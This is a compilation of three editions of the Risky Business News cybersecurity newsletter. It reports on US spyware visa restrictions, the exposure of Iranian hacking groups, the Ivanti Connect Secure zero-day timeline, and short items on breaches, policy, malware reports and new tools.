This newsletter is brought to you by Thinkst, the makers of the much-loved Thinkst Canary. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
The US government has restricted visas for individuals involved in the development and misuse of commercial spyware.
The Department of State says commercial spyware has facilitated repression and enabled human rights abuses.
"Such targeting has been linked to arbitrary detentions, forced disappearances, and extrajudicial killings in the most egregious of cases. Additionally, the misuse of these tools presents a security and counterintelligence threat to U.S. personnel," Secretary of State Antony Blinken said in a statement.
The visa restriction applies to individuals who developed or sold commercial spyware but also to those who misused it. It also applies to close family members, such as spouses and children.
Officials did not name any commercial spyware vendors. A State Department representative told Axios they plan to decide which commercial spyware vendor falls under the visa ban on a case-by-case basis.
The visa restriction is extremely likely to apply to individuals linked to spyware vendors such as Candiru, NSO Group, Intellexa, and Cytrox. The US has placed the four companies on trade blacklists in 2021 and 2023, respectively.
In March 2023, the White House also issued an executive order banning US federal agencies from contracting commercial spyware from vendors with a known track record of misuse, fearing the dodgy products could be misused to spy on US investigations, posing a national security risk.
In a report this week, Google said it currently tracks around 40 commercial spyware vendors "with varying levels of sophistication and public exposure, selling exploits and surveillance capabilities to government customers."
"Investors fuel mercenary spyware proliferation," CitizenLab's John Scott-Railton explained in a series of posts on social media. "Now, even investors willing to gamble and take a loss if a company is sanctioned... will be wondering about [the] possibility of not getting a US visa. Big signal. Big deal."
In addition, a visa entry ban list has other benefits. The biggest is that it can be managed and expanded much easier and faster than an international sanctions list that needs to be coordinated with different US government agencies and maybe some foreign countries.
It remains unclear how the visa restriction will work with citizens of countries with a visa waiver.
Breaches, hacks, and security incidents
Deepfake theft incident: An employee at a multinational company in Hong Kong sent $25 million to scammers. The employee transferred the funds after the scammers invited them to a meeting with deepfake versions of their colleagues and chief financial officer. Hong Kong police said the theft is one of many similar incidents where deepfake technology was used. [Additional coverage in CNN]
Google+ breach settlement: Google has agreed to pay $350 million to settle a class action lawsuit over a security lapse at its defunct Google+ social network. The incident took place in 2018 when Google discovered that the Google+ API exposed the data of 52.5 million users. Google initially agreed to pay $7.5 million to affected users in a separate lawsuit. The new $350 million settlement is for individuals who bought Google stock between April 2018 and April 2019 and were impacted by Google's security blunder. [Additional coverage in WaPo]
Philippines govt cyberattacks: Hackers operating out of China tried to break into websites and email systems of the Philippine government. The attackers DDoSed government sites and attempted to break into Google Workspace admin accounts. Philippine officials say the attacks came from Chinese IPs but didn't attribute the attacks to the Chinese government. [Additional coverage in PhilStar]
Japan MFA hack: Chinese state-sponsored hackers have allegedly breached a system used by the Japanese Ministry of Foreign Affairs to exchange diplomatic cables. The hack took place in 2020 and was initially detected by US authorities. The same hacking campaign also breached a network used by the Japanese Defense Ministry to handle classified military information. In light of the hacks, the Japanese government committed to hiring 20,000 cybersecurity professionals in the coming years. [Additional coverage in Yomiuri, Piyolog, and MofA/PDF]
Netherlands MoD hack: The Dutch government says that Chinese cyber spies breached an unclassified military defense network in a security breach last year. According to a technical report published by the Dutch military intelligence agency, the hackers gained access after exploiting an old vulnerability (CVE-2022-42475) in an unpatched FortiGate firewall. The threat actor deployed an advanced backdoor named COATHANGER that was designed to survive both reboots and firmware upgrades.
General tech and privacy
Apple warning: Apple Fellow Phil Schiller—who heads the company's App Store—warns that EU users will be more vulnerable to attacks and intrusive tracking after the EU forced the company to open its platform for third-party app stores. [Additional coverage in Fast Company]
Google Rust grant: Google has announced a $1 million grant for the Rust Foundation to improve the programming language's interoperability with C++.
Copilot lowers code quality: A new GitClear study has found that GitHub's new AI-powered Copilot tool lowers code quality and maintainability. [Additional coverage in Visual Studio Magazine]
Android Virtualization Framework: Here's a list of Android smartphones that support the new Android Virtualization Framework that shipped with Android 14.
Pkl: Apple has open-sourced a new programming language named Pkl (pronounced Pickle), an embeddable configuration-as-code language designed for runtime configuration. Pkl can work with apps written in Go, Swift, Java, and Kotlin.
Mozilla Monitor Plus: Mozilla has launched a paid version of its Monitor service that will allow users to remove subscribers' data from data broker services. The new service is named Mozilla Monitor Plus and will cost users $8.99 per month.
Government, politics, and policy
Russia formally bans VPNs: The Russian government has formally banned the use of VPN services starting on March 1 this year. The ban was announced by Ekaterina Mizulina, Chairwoman of the Safe Internet League, a para-government organization that works with the Kremlin to censor the Russian internet. Mizulina described the ban as a measure needed to stop VPNs from siphoning information from Russian devices. The Russian official was sanctioned by the EU at the end of January for her work on restricting freedom of opinion and expression in Russia. She is often described as Russia's main censor. The official ban comes as Russian officials repeatedly claimed they would not ban VPN services. Russian telecommunications watchdog Roskomnadzor has been silently banning VPN services and protocols since Russia's invasion of Ukraine. [Additional coverage in TASS]
Russian internet censorship visibility: Russian officials are planning to limit access to the list of websites blocked by Russian telecommunications watchdog Roskomnadzor. [Additional coverage in Kommersant]
US industry group pushback: Cybersecurity and tech trade groups are urging the US government to rethink its new cybersecurity requirements for federal contractors. The new requirements include stricter breach reporting and the use of software bills of materials (SBOMs). [Additional coverage in NextGov]
Pall Mall Process: Thirty-six countries have signed a new international agreement at an event in London to tackle the hacker-for-hire and commercial spyware industry. Named the Pall Mall Process, the agreement will encourage governments to tackle the growing number of companies providing such services. Israel, the home of many of these companies, did not attend. Representatives from Apple, Google, Microsoft, and other private-sector companies were also at the event.
Sponsor section
In this Risky Business News sponsor interview, Tom Uren talks to Haroon Meer of Thinkst Canary. They discuss how network attackers win, how their tactics have changed over time, and what this means for network defenders.
Cybercrime and threat intel
Grandoreiro money mules: Spain's National Police has detained 133 suspected money mules for allegedly helping the Grandoreiro malware gang launder stolen funds. The suspects were detained over the course of the past two years. Brazilian police detained five individuals last month believed to be the leaders of the Grandoreiro malware gang. The Grandoreiro gang has targeted and stolen funds from customers of banks in Brazil, Spain, Portugal, and Mexico since 2019.
Google's view of the commercial spyware industry:Google says it is tracking around 40 entities that are currently active on the commercial surveillance market. The companies have varying degrees of sophistication and are involved in the sale of exploits and turn-key surveillance capabilities to government customers. Google says that 20 of the 25 zero-days discovered last year were linked to spyware vendors. The company also says that half of the zero-days discovered in Google products since 2014 are also linked to spyware vendors.
ResumeLooters: A cybercrime group named ResumeLooters has breached and stolen sensitive data from at least 63 websites across Southeast Asia. The group's attacks leveraged SQL injection and XSS vulnerabilities to gain access to its victims' backend databases. Security firm Group-IB says the group has stolen more than 2 million records, many of which were later sold on Telegram channels for Chinese-speaking cybercriminals. Over a quarter of the stolen data was taken from job search portals.
RedCurl: FACCT has published a new report on RedCurl, a financially motivated hacking group. According to the new report, RedCurl has now expanded operations to Southeast Asia and Australia. The Russian security firm described the group as "Russian-speaking."
C2 infrastructure report: Cobalt Strike has remained the top choice for adversary command and control (C2) infrastructure last year, according to a recent Sekoia report. It's honestly no surprise. Cobalt Strike has been the top choice for APTs and cybercrime operators for more than half a decade now.
Ransomware in 2023: Palo Alto Networks has published a yearly overview of the 2023 ransomware landscape. Last year, activity hit an all-time high, with 3,998 victims listed on leak sites and 25 new ransomware leak sites launched on the dark web. Malwarebytes also published a report on the same topic.
Malware technical reports
BlackHunt ransomware: Rapid7 has published a technical write-up on BlackHunt, the ransomware gang that recently hit a major Paraguayan ISP. Researchers say BlackHunt uses some of the leaked LockBit source code and has been heavily inspired by REvil operations.
Mispadu Stealer: Palo Alto Networks has published a report on Mispadu Stealer, an infostealer that is commonly used to target LATAM organizations.
Ov3r_Stealer: Trustwave looks at Ov3r_Stealer, a new infostealer spread online using phishing and Facebook ads.
PikaBot: Logpoint has published a report on the PikaBot loader, which has been offered as a MaaS since early 2023.
Sponsor Section
Most companies discover they've been breached way too late. Thinkst Canary fixes this: just 3 minutes of setup, no ongoing overhead, nearly 0 false positives, and you can detect attackers long before they dig in. Check out why our Hardware, VM, and Cloud-based Canaries are deployed and loved on all 7 continents.
APTs, cyber-espionage, and info-ops
Midnight Blizzard Microsoft hack: SpecterOps researchers have published an analysis of how the Midnight Blizzard Russian APT breached Microsoft's infrastructure.
Vulnerabilities, security research, and bug bounty
Canon security updates: Printer maker Canon has published a security update to patch seven issues in its printer firmware. The vulnerabilities were used at last year's Pwn2Own hacking contest.
Ivanti zero-day write-up: Assetnote has published a technical write-up on CVE-2024-21893, the latest of the three recent zero-days in Ivanti Connect Secure VPN appliances. This has now entered mass exploitation after twoPoCs were published online.
Ivanti Avalanche write-up: Trend Micro's ZDI has published a write-up on CVE-2023-46263, an arbitrary file upload vulnerability in the Ivanti Avalanche MDM product.
MikroTik unpatchable jailbreak: Agile Information Security's Pedro Ribeiro has published a jailbreak for MikroTik Cloud Hosted Router (CHR).
CISA KEV 2023 analysis: Security firm Horizon3 has analyzed all the entries published in 2023 in CISA KEV, a database of actively exploited vulnerabilities. Almost half of actively exploited bugs discovered last year targeted insecure exposed functions rather than memory corruption issues, leading researchers to believe that a transition to Rust coding won't put a dent in actively exploited bugs as it was initially believed.
Infosec industry
Employee trust in security teams: A CybSafe survey found that 97% of employees across the UK and US trust their cybersecurity teams despite having trust and visibility fears.
VT Livehunt Cheat Sheet: Google has published a cheat sheet for its VirusTotal Livehunt service.
New tool—Root User Alarm: Software engineer Ben from KC has published a Terraform library named Root User Alarm that will automatically configure AWS root user usage alarms.
DEF CON conference canceled and uncanceled: The DEF CON cybersecurity conference was forced to relocate to a new venue after Caesars Hotels abruptly terminated its contract. This year's event was canceled for a day before organizers found an empty venue during the busy Las Vegas August period. DEF CON 32 will now be hosted at the Las Vegas Convention Center from August 8 to 11. The DEF CON conference was canceled for the first time in its history and went to virtual format in 2020 due to the COVID-19 pandemic.
BSides London videos: Talks from the BSides London 2023 security conference, which took place in December, are now available on YouTube.
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq talk about what up-and-coming countries should expect from a Cyber Command and whether they should invest in it.
This newsletter is brought to you by Thinkst, the makers of the much-loved Thinkst Canary. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
The identities of two Iranian cyber groups have been exposed over the course of seven days last week.
The US government linked the Cyber Av3ngers group to six individuals working for the Iranian Islamic Revolutionary Guard Corps Cyber-Electronic Command (IRGC-CEC), while a report from Iran International linked the Black Shadow group to an Iranian IT company named "Raahkarha-ye Fanavari-e Etela'at-e Jahatpardaz" (or Jahatpardaz Information Technology Solutions).
The "doxing" events come as Iranian cyber activity entered a new and more aggressive stage after Iran-backed Hezbollah attacked Israeli territories on October 7 last year.
While Cyber Toufan's data-wiping campaign had arguably the most destructive impact, it went under the radar because it primarily and exclusively hit Israeli organizations.
On the other hand, Cyber Av3ngers had the biggest impact on an international level after the group gained access to PLC equipment used in critical infrastructure and defaced their screens with anti-Israel and pro-Gaza messages.
The group only targeted PLCs from Israeli company Unitronics, which they breached using the device's default password of "1111".
The Cyber Av3ngers attacks took place at the end of November, and one of their victims was the water authority in Aliquippa, Pennsylvania. The hack spurred a security assessment spree around the globe, with national CERTs urging critical infrastructure operators to make sure critical infrastructure equipment is secured with strong passwords or placed behind VPN gateways and firewalls.
But while Cyber Av3ngers has effectively been an Iranian intelligence op posing as grassroots hacktivism, Black Shadow has been the opposite.
The group is one of the many IT companies that provide cyber capabilities to the Iranian government. Its activities go back years, with Western cybersecurity companies tracking the group under names such as Agrius, DEADWOOD, SharpBoys, and Americium/Pink Sandstorm. It is a legitimate APT, and back in May 2023, Microsoft linked it to Iran's Ministry of Intelligence and Security, or the MOIS, the country's main intelligence service [see PDF, page 6, or graph below].
Iran International claims it identified nine of the group's members, who operate from two offices in Tehran. [archive 1, archive 2]
The report has had minimal traction online, so we couldn't gauge its validity from other industry experts. Those who we contacted declined to comment, citing the need for more time to investigate it further. While it is a report from a non-government and non-threat intel source, the report is very likely to be accurate. Iranian cyber operations have been doxed more times than any other major cyber power, primarily due to the regime's oppressive hand that has indirectly led to the rise of silent dissenters and leakers among its ranks.
Breaches, hacks, and security incidents
Cloudflare security breach:Cloudflare says that a state-sponsored threat actor gained access to its Atlassian servers during the Thanksgiving holiday last year. The attackers used legitimate server credentials that Cloudflare failed to revoke after the Okta security breach from a month earlier, in October. Cloudflare says the compromised server had no customer data, and the breach was immediately detected and contained. The company did not make a formal attribution but says the threat actor sought to obtain persistent and widespread access to its network.
Football Australia leak: Australia's soccer federation exposed AWS access keys in its website's source code, allowing threat actors easy access to more than 127 of its storage buckets. The organization is currently investigating the impact of the breach. [Additional coverage in the Sydney Morning Herald]
Abracadabra Money crypto-heist: A threat actor stole $6.5 million worth of crypto-assets from DeFi protocol Abracadabra Money. The platform says the threat actor exploited a vulnerability in its platform to borrow the funds illegally. The company has sent the attacker a blockchain note asking for its funds back in exchange for a white-hat reward—in yet another shady attempt to hide a malicious hack as vulnerability research. [Additional coverage in DailyCoin]
Clorox ransomware attack: Cleaning products maker Clorox has reported losses of $49 million in connection to a cyberattack the company suffered in August of last year. The figure covers incident response costs, third-party consulting services, and operating costs from the resulting business disruption. In SEC filings last year, Clorox said it expected sales to drop by $356 million as a result of the same incident. The company's CISO also departed weeks after the incident. [Additional coverage in SecurityWeek]
AnyDesk breach: Remote access software company AnyDesk suffered a security breach [archived] on January 29. Hackers accessed internal systems and stole AnyDesk's source code and code signing certificates. The company says that it does not store tokens or keys for accessing remote AnyDesk installs. It did initiate a password reset for customer accounts on its website and support portals. AnyDesk claims it serves more than 170,000 customers, including some of the world's largest companies. The company says the incident is not ransomware. [Additional coverage in BleepingComputer]
General tech and privacy
FTC Blackbaud order: Cloud service provider Blackbaud will be required to delete user data that it does not need for its operations. The requirement is part of a settlement with the US Federal Trade Commission, which sued the company in the aftermath of BlackBaud's 2020 security breach. The company previously also paid a $3 million fine to the SEC for making misleading disclosures about the same incident.
Post-quantum crypto in Firefox: Mozilla has added support for post-quantum cryptography protections in Firefox Nightly. This can be enabled by going to about:config and enabling security.tls.enable_kyber.
RCS protocol: The EFF has published a blog post looking over the new RCE protocol and its downsides and security weaknesses.
Google Search Cache button: Google plans to remove the "cache" feature from its search engine. The feature allows users to view an archived version of a web page as it was recorded by Google during its most recent visit. The company has already removed the "Cache" button from search results and plans to remove the ability to prepend URLs with the "cache:" prefix to view their cached versions. The feature has been used in the past during malware investigations and to bypass paywalls and geo-filters. [Additional coverage in Search Engine Roundtable]
New Teams feature: Microsoft has added a new feature to its Teams application that can allow administrators to disable copying text or forwarding messages from an active chat. The feature is meant to prevent data leakages from sensitive meetings.
Games in Russia: Sony is blocking users from Russia and Belarus from activating its games on the Steam platform. Sony previously stopped PlayStation sales in Russia in March 2022, shortly after its invasion of Ukraine.
Hulu cracks down on password sharing: Following Netflix's move, Hulu has also banned password sharing. Only users in the same household will be allowed to share an account. Users in different locations will need their own accounts. [Additional coverage in The Hollywood Reporter]
Government, politics, and policy
UN Cybercrime Treaty: Royal Hansen, Google's Vice President of Privacy, Safety and Security Engineering, warns that the current version of the UN Cybercrime Treaty criminalizes vulnerability and cybersecurity research.
Tesla car ban: The Chinese government has banned Tesla cars from entering government-affiliated buildings and adjacent premises. According to messages posted on social media by Chinese Tesla drivers, the ban appears to have entered into effect at the end of 2023. Chinese officials cited Tesla's sentry mode feature and its extensive data collection practices. Beijing banned Tesla cars from entering military bases shortly after the carmaker entered the Chinese market. [Additional coverage in Nikkei]
Russia's internet censorship: A third of Russian websites are at risk of getting blocked inside the country after their foreign web hosting providers have not registered with officials. The providers are in violation of a new Russia law that requires all cloud and web hosting providers to register with the Roskomnadzor, Russia's telecommunications watchdog. The new law entered into effect on December 1 of last year, and providers that did not register risk having their servers blocked inside Russia. Only 266 web hosting providers have registered with the Roskomnadzor, and all are local companies. [Additional coverage in Ria Novosti]
New NSA & CYBERCOM head: US Air Force General Timothy Haugh has officially taken over the position of Director of the National Security Agency and Commander of US Cyber Command. Gen. Haugh replaces US Army General Paul Nakasone, who led both agencies since May 2018. Haugh previously served as the deputy commander of US Cyber Command and was the inaugural head of the 16th Air Force, the branch's first cyber unit.
FTC to make cloned voice calls illegal: The Federal Communications Commission plans to vote to make AI-generated voice calls illegal. The agency says robocalls using cloned voices have escalated over the past years. Scammers have used AI technology to clone the voices of family members, celebrities, and politicians to defraud users.
Robocall success: The US government says it recorded a reduction in the number of illegal robocalls across US mobile networks. The decline comes three months after the FCC and FTC sent letters to seven of the US' top telephony network providers. Companies like CenturyLink, Bandwidth, and TeleCall allegedly worked to detect and block common sources of robocall spam.
FETTA: CERT teams from Poland and Luxembourg have launched the Federated European Team for Threat Analysis, or FETTA, a project aiming to create a federated team to provide CTI products and tooling to EU partners.
Sponsor section
In this Risky Business News sponsor interview Tom Uren talks to Haroon Meer of Thinkst Canary. They discuss how network attackers win, how their tactics have changed over time and what this means for network defenders.
Cybercrime and threat intel
Vault7 leaker sentenced: A US judge has sentenced a former CIA employee to 40 years in prison for leaking classified information to WikiLeaks. The leaked documents are known as Vault7, and they revealed extremely sensitive information about the CIA's hacking capabilities. Joshua Schulte was arrested and has been in jail since 2018. Schulte's sentence covers espionage, hacking, contempt of Court, making false statements to the FBI, and child pornography.
SIM swapper sentenced: A judge has sentenced an Oregon man to three years in prison for stealing millions of dollars in cryptocurrency through SIM swapping. According to court documents, Daniel James Junk stole more than $3 million from dozens of victims between December 2019 and March 2022. Officials say Junk was a member of an online community specialized in SIM swapping attacks.
FTX SIM swappers charged: The US has charged three suspects for allegedly stealing more than $400 million from cryptocurrency exchange FTX. US prosecutors allege the three suspects used SIM-swapping attacks to take control of an FTX employee's phone number and move crypto-assets from its official accounts. The hack took place in November 2022 as the company was collapsing into bankruptcy and was initially thought to be an inside job. [Additional coverage in Ellipticand ArsTechnica]
"A recent indictment alleged that Robert Powell—using online monikers "R," "R$," and "ElSwapo1"—was the "head of a SIM swapping group" called the “Powell SIM Swapping Crew.” He allegedly conspired with Indiana man Carter Rohn (aka "Carti" and "Punslayer") and Colorado woman Emily Hernandez (allegedly aka "Em") to gain access to victims' devices and "carry out fraudulent SIM swap attacks" between March 2021 and April 2023."
BEC scam recovery: The US Secret Service has recovered more than $3 million stolen by BEC scammers from the North Carolina Housing Finance Agency in April 2023. [Additional coverage in The Record]
Spyware maker shuts down: Two phone surveillance solutions named PhoneSpector and Highster appear to have shut down operations shortly after getting fined $410,000 by New York's OAG. [Additional coverage in TechCrunch]
Spyhide profile: NZZ reporters have published a profile on Spyhide, a now-defunct Iranian spyware vendor. The service had shut down after getting hacked by a Swiss hacker.
Wikipedia scams: The Wikipedia editorial team has published an article on how "reputation companies" are scamming users and companies across the world with so-called Wikipedia page creation or page editing services.
New npm malware: Thirty-three malicious npm packages were discovered last week. Check out GitHub's security advisory portal for more details.
TeamTNT doppelgänger: DataDog's security team has tracked a cryptomining campaign that has targeted servers with exposed Docker APIs. This blog post seems to cover a threat actor that Cado named Command Cat.
DangerDev: Invictus IR has published a report on DangerDev, a threat actor seen hijacking AWS infrastructure for cryptomining. The threat actor seems related to what DataDog covered here.
AlphV operations: Security firm AreteIR is reporting that the AlphV ransomware group has returned with new attacks despite a US takedown in mid-December of last year.
Shadow rebrand: The Shadow ransomware gang has rebranded under the name of DARKSTAR. The gang has a history of primarily attacking Russian organizations. It was previously also known as Comet.
REF0657: Elastic's security team looks at REF0657, a threat actor that hit a financial services organization in South Asia in December 2023.
DeFi scams: Sophos' Sean Gallagher looks at the recent "DeFi mining" and "DeFi Savings" crypto scams that have flooded social media over the past months.
NetOps exposure: Threat intel company Resecurity has identified more than 1,500 compromised network operator accounts that are currently being sold on the dark web. The accounts provide access to RIPE, APNIC, LACNIC, and AFRINIC management portals, where threat actors can hijack BGP routes and hijack internet traffic. Resecurity says account credentials were stolen after operators had their systems infected with infostealers.
Malware technical reports
Smargaft technique: A new IoT botnet named Smartgaft is abusing Binance smart contracts to host and hide information about the location of its command and control servers. Chinese security firm QiAnXin first spotted the botnet in October of last year and said Smartgaft is being used to launch DDoS attacks and run a malicious proxy network. The botnet is the second threat actor to hide information about its infrastructure in Binance smart contracts after the ClearFake gang. The technique is known as EtherHiding.
Backdoor Activator: SentinelOne's Phil Stokes looks at Backdoor Activator, a novel macOS malware currently distributed via pirated macOS apps. With macOS gaining ground in the enterprise market, we are now seeing more and more malware gangs focusing on macOS systems.
Zephyr: AhnLab researchers look at Zephyr, a cryptominer distributed via phishing campaigns.
AZORult: CyberInt researchers have published a technical dive into the AZORult infostealer.
Qakbot: Zscaler analysts look at how the Qakbot malware has evolved over the past 15 years since its creation.
Sponsor Section
Most companies discover they've been breached way too late. Thinkst Canary fixes this: just 3 minutes of setup, no ongoing overhead, nearly 0 false positives, and you can detect attackers long before they dig in. Check out why our Hardware, VM, and Cloud-based Canaries are deployed and loved on all 7 continents.
APTs, cyber-espionage, and info-ops
Stately Taurus: CSIRT-CTI has published details on more Stately Taurus campaigns targeting the Myanmar military regime, attacks the company documented in a previous blog post.
Kimsuky: Chinese security firms Sangfor and QiAnXin have published reports on Kimsuky's recent operations targeting South Korean organizations with the Xeno RAT.
APT-K-47 (Mysterious Elephant): Chinese security firm KNOW Chuangyu has published a report on new tools used by APT-K-47 (Mysterious Elephant), an APT they believe might be tied to the Bitter group. [Now in English here]
STEADY#URSA: Securonix has published details on STEADY#URSA (aka Shuckworm), a Russian threat actor targeting Ukrainian military personnel with a new PowerShell-based backdoor named SUBTLE-PAWS. The backdoor can spread via infected USB devices.
2023 APT report: Chinese security QiAnXin has published its year-in-review report for APT activity observed in 2023.
Vulnerabilities, security research, and bug bounty
Confluence honeypot spam: VulnCheck researchers say the internet has been flooded with Atlassian Confluence honeypots, which is making the discovery of real servers a much harder operation. The company has found that only 4,000 of the 240,000 Confluence systems are legitimate servers. The number of Confluence honeypots has exploded after several highly critical vulnerabilities have been disclosed and exploited in the wild over the past months. Currently, CISA's KEV database lists nine Confluence vulnerabilities exploited in the wild.
ModSecurity vulnerability: SicuraNext's Andrea Menin has published an analysis of CVE-2024-1019, a vulnerability in the ModSecurity open-source WAF that allows threat actors to bypass the firewall.
QNAP security updates: Taiwanese NAS vendor QNAP has released 23 security updates for its products.
Juniper security updates: Juniper has released a security update to patch 20 vulnerabilities in its JSA (Juniper Secure Analytics) series.
Zyxel security updates: Zyxel has released a security update to fix a post-auth command injection vulnerability in its NAS products.
Flysmart+ Manager vulnerabilities: Pen Test Partners have found vulnerabilities in Flysmart+ Manager, a mobile app developed by Airbus and used by pilots to manage their flight schedules.
Vinchin vulnerabilities: LeakIX has published a write-up on five vulnerabilities in the Vinchin Backup & Recovery solution. The bugs—from CVE-2024-22899 to CVE-2024-22903—can be chained for RCE attacks.
Infosec industry
PAN loses patent lawsuit: A judge awarded cybersecurity company Centripetal Networks $151.5 million in damages in a patent infringement lawsuit filed against Palo Alto Networks. A jury trial found that Palo Alto Network infringed on four of Centripetal's "threat intelligence gateway" patents. Centripetal was previously awarded $2.75 billion in a 2020 lawsuit against Cisco, the largest patent infringement penalty in US history. Cisco had the record-breaking award invalidated in an appeal last year. [Additional coverage in MarketScreener]
New tool—DCV Inspector: Security researcher Andrew Ayer has open-sourced DCV Inspector, a tool to inspect the DNS, HTTP, and SMTP requests made by a certificate authority during domain validation.
New tool—OSS-Fuzz-Gen: Google has open-sourcedOSS-Fuzz-Gen, a new LLM-driven fuzzing framework based on its OSS-Fuzz toolkit.
New tool—Deluder: Software engineer Michal Válka has released Deluder, a tool for intercepting traffic of proxy-unaware applications. It currently supports OpenSSL, GnuTLS, SChannel, WinSock, and Linux Sockets.
New tool—ThievingFox: Security researcher Slowerzs has open-sourced a red-team tool named ThievingFox, a collection of post-exploitation tools to gather credentials from various password managers and Windows utilities.
New tool—DIFFER: Security firm Trail of Bits has open-sourced a tool named DIFFER that can find bugs and soundness violations in transformed programs.
"We used DIFFER to evaluate 10 software debloating tools, and it discovered debloating failures or soundness violations in 71% of the transformed programs produced by these tools."
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq talk about how the war in Ukraine is showing how useful mobile devices are in a war. Using them is risky, but those risks need to be managed.
This newsletter is brought to you by enterprise browser maker Island. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
All journalists take pride in being able to put together smart and intelligible sentences that convey a story. However, three weeks after Invanti disclosed the existence of two zero-days in its Connect Secure VPN appliance, things have become so twisted and convoluted that, at this point, I feel like it's time to bring out the bulleted list format in order to put some order in the ginormous clusterf**k that these zero-days have become.
So, for the sake of clarity—both mine and yours—let's review where things stand with the recent batch of Ivanti zero-days and their exploitation.
On January 10, Ivanti published a security advisory on two vulnerabilities in its Connect Secure (formerly Pulse Secure) VPN appliance that were exploited in the wild. These two zero-days were assigned CVE-2023-46805 (authentication bypass) & CVE-2024-21887 (command injection).
The security advisory did not include firmware patches but only temporary mitigations in the form of an encrypted XML file that customers were supposed to run on their devices.
On the same day, security firm Volexity published a blog post and linked the attacks exploiting the two zero-days to a Chinese cyber-espionage group they were tracking as UTA0178.
Two days later, on January 12, Mandiant confirmed the attacks and linked them to a group they were calling UNC5221.
The threat actors were installing webshells and backdoors on the compromised devices. Attackers also installed JavaScript on the login pages to capture employee logins.
Malware installed on infected devices includes stuff named GLASSTOKEN, GIFTEDVISITOR, BUSHWALK, WIREFIRE, LIGHTWIRE, FRAMESTING, THINSPOOL, ZIPLINE, WARPWIRE, and KrustyLoader. (These are detailed in technical reports from Volexity, Volexity, Volexity, Mandiant, Mandiant, QuoIntelligence, and Synacktiv)
Some of these webshells and backdoors were exposed on the internet and could be fingerprinted, allowing security firms to determine the location of infected devices across the world. The number of infected devices is usually around a few hundred infected systems per day, but at one point, it peaked at around 1,700.
A week later, on January 18, attacks against Connect Secure devices entered the mass-exploitation phase after proof-of-concept code was published online. Cryptominers botnets were the first to get in the act, per GreyNoise and Volexity. Initial access brokers and ransomware most likely followed—although unconfirmed for now.
Exploitation could be detected by looking at the device's network traffic, the device's logs, or by running Ivanti's Integrity Checker Tool.
The attacker also backdoored the device's configuration file. This meant that companies that applied the mitigation and then re-applied a backup of an older configuration file were reinfecting themselves.
After the attacks were exposed and Ivanti released mitigations, security firms saw the Chinese APT bypassing both mitigations and Ivanti's Integrity Checker Tool.
The APT's efforts to remain on the infected devices were most likely what caused Ivanti to delay its firmware patches, initially scheduled for January 22.
On the day of the scheduled patch, Ivanti released an "external" Integrity Checker Tool that companies could use on their devices instead of the default (internal) one that was shipped with its devices and most likely compromised/altered.
These firmware updates came out on January 31—but with a surprise. They also patched two other vulnerabilities tracked as CVE-2024-21888 (privilege escalation) and CVE-2024-21893 (server-side request forgery).
Ivanti said that CVE-2024-21893 was also exploited in the wild. Neither the company nor Volexity, Mandiant, or other security firms linked this zero-day to the Chinese APT or any other threat actor.
With the release of the firmware updates, the company also updated its mitigations file.
Ivanti also told customers to factory reset their devices before applying the firmware patch, as a way to prevent attackers from remaining on infected devices.
The company's firmware update covers only recent Connect Secure versions, and patches for older versions are scheduled for the coming weeks.
The same vulnerabilities also affect Ivanti Policy Secure network gateways, although no attacks have been reported against these systems so far.
In light of the Ivanti update, CISA has told federal agencies to disconnect affected Ivanti instances from their networks by Saturday, February 3. Agencies are allowed to reconnect devices only if they've been factory reset and updated according to Ivanti's instructions.
Breaches, hacks, and security incidents
Ripple founder hacked: A threat actor has hacked and stolen $112.5 million worth of crypto-assets from Chris Larsen, the co-founder and executive chairman of the Ripple (XRP) cryptocurrency. Larsen confirmed the hack and said that only personal accounts were affected. Even if Ripple Labs accounts were not affected, Ripple's price dropped 5% in the aftermath of the hack. [Additional coverage in CoinTelegraph]
Binance leak: Congratulations to Binance for leaving sensitive source code and internal passwords exposed on GitHub for months. [Additional coverage in 404 Media]
GAC data breach: The Canadian government is investigating a security breach at its foreign affairs department. A spokesperson for Global Affairs Canada (GAC) says the agency has restricted remote access to some of its networks following the detection of "malicious cyber activity." The breach took place on January 24 and impacted the department's network across Canada. Overseas embassies and consulates are not affected. [Additional coverage in The Canadian Press]
Mexico government hack: A threat actor has breached the account of a Mexican government employee and has stolen the personal details of 263 journalists. The hacker is believed to have stolen data such as names, home addresses, and copies of passports and voter ID cards. Government officials say the breach took place on January 22 and impacted journalists accredited to attend the President's daily press conferences. [Additional coverage in Reuters]
Pegasus in Jordan: Researchers from AccessNow, CitizenLab, and HumanRightsWatch have found traces of the Pegasus spyware on the smartphones of 35 individuals in Jordan. Targeted victims include journalists, political activists, civil society members, and human rights lawyers. The earliest infections date back to March 2021, while the latest was in October 2023. Researchers say Pegasus was installed using PWNYOURHOME, FINDMYPWN, FORCEDENTRY, and BLASTPASS, all known zero-click exploits linked to the NSO Group, the spyware's maker.
General tech and privacy
Uber GDPR fine: American ride-hailing and food delivery company Uber was fined €10 million by the Dutch data protection agency for breaking the EU's GDPR rules. The agency says Uber made it unnecessarily complicated for drivers to see how their data was used, shared, and where. Besides Dutch drivers, the agency says it received complaints from France as well.
M365 Rust rewrite: Microsoft is hiring engineers to help it rewrite its Microsoft 365 platform in Rust as part of an effort to modernize its services.
CAA for S/MIME: The CA/Browser Forum has voted to require certificate authorities to support Certification Authority Authorization (CAA) for S/MIME certificates.
Fastly moves to BoringSSL: CDN provider Fastly has migrated from OpenSSL to BoringSSL.
Pixel passkey upgrade: Google has updated the built-in password manager on its Pixel smartphones to scan saved accounts and tell users which online services support passkeys. If passkey-compatible accounts are found, the Pixel Password Manager will prompt users to add passkeys to the accounts just by tapping a few buttons.
Government, politics, and policy
Children Online Safety Senate hearing: The CEOs of Discord, Meta, Snap, Twitter, and TikTok testified in front of a US Senate Judiciary Committee on how they protect children on their platforms. Let's just say all five got an earful from the present Senators since the platforms have done a terrible job so far. [Additional coverage in CNBC, The Record]
